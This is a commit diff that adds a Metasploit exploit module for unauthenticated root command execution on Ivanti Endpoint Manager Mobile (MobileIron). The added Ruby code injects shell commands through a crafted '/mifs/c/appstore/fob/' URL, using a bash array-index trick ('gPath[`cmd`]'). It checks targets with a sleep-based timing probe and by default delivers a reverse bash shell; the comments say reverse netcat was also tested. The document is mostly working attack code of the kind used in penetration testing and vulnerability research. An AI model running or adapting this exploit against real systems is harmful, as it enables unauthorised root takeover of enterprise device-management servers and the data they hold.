add in a module and docs fo rteh EPMM exploit

modules/exploits/linux/http/ivanti_epmm_rce.rb

@@ -0,0 +1,144 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti Endpoint Manager Mobile (EPMM) unauthenticated RCE',
+        'Description' => %q{
+          This module exploits a OS command injection issue in Ivanti Endpoint Manager Mobile (EPMM), formerly known
+          as MobileIron. A remote attacker can achieve unauthenticated RCE with root privileges on an affected device.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'watchTowr', # Original analysis and PoC
+          'sfewer-r7' # MSF module
+        ],
+        'References' => [
+          ['CVE', '2026-1281'],
+          ['CVE', '2026-1340'],
+          # Vendor advisory
+          ['URL', 'https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US'],
+          # Vendor guidance
+          ['URL', 'https://forums.ivanti.com/s/article/Analysis-Guidance-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US'],
+          # Technical analysis & PoC
+          ['URL', 'https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/']
+        ],
+        'DisclosureDate' => '2026-01-29',
+        'Privileged' => true, # Executes as root.
+        'Platform' => ['unix', 'linux'],
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          [
+            # Successfully tested with the following payloads against MobileIron 11.2:
+            #   cmd/unix/reverse_bash
+            #   cmd/unix/reverse_netcat
+            # NOTE: The Linux fetch payloads did not work on MobileIron 11.2, YMMV on later product versions.
+            'Default', {
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash',
+                'FETCH_WRITABLE_DIR' => '/tmp'
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([OptString.new('TARGETURI', [true, 'Base path', '/'])])
+  end
+
+  def check
+    res_ver = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'mifs', 'user', 'login.jsp')
+    )
+
+    return CheckCode::Unknown('Connection to /mifs/user/login.jsp failed') unless res_ver
+
+    return CheckCode::Unknown("Unexpected /mifs/user/login.jsp response code #{res_ver.code}") unless res_ver.code == 200
+
+    ver_match = res_ver.body.match(/ui\.login\.css\?([\d.]+)"/)
+
+    return CheckCode::Unknown('Failed to version match on ui.login.css') unless ver_match
+
+    product_name = 'EPMM'
+
+    # Ivanti acquired MobileIron and rebranded it to Endpoint Manager Mobile (EPMM) around version 11.4.
+    if Rex::Version.new(ver_match[1]) < Rex::Version.new('11.4.0.0')
+      product_name = 'MobileIron'
+    end
+
+    version_string = "Detected Ivanti #{product_name} version #{ver_match[1]}"
+
+    sleep_seconds = rand(4..8)
+
+    begin_time = Time.now
+
+    # We use proof-of-execution in the form of a delay to confirm if a target is vulnerable.
+    res = execute_cmd("sleep #{sleep_seconds}")
+
+    end_time = Time.now
+
+    return CheckCode::Unknown("#{version_string}. Connection failed") unless res
+
+    if (end_time - begin_time) < sleep_seconds
+      return CheckCode::Safe(version_string)
+    end
+
+    CheckCode::Vulnerable(version_string)
+  end
+
+  def exploit
+    execute_cmd(payload.encoded)
+  end
+
+  def execute_cmd(cmd)
+    elements = {
+      'kid' => rand(32),
+      'st' => 'theValue'.ljust(10),
+      'et' => (Time.now + + (60 * 60 * rand(24))).to_i,
+      'h' => "gPath[`#{cmd}`]"
+    }
+
+    hash = 'sha256:'
+
+    hash += elements.map { |k, v| "#{k}=#{Rex::Text.uri_encode(v.to_s, 'hex-noslashes')}" }.join(',')
+
+    vprint_status("hash: #{hash}")
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(
+        target_uri.path,
+        'mifs',
+        'c',
+        'appstore',
+        'fob',
+        '3',
+        rand(1024).to_s,
+        hash,
+        "#{SecureRandom.uuid}.ipa"
+      )
+    )
+  end
+end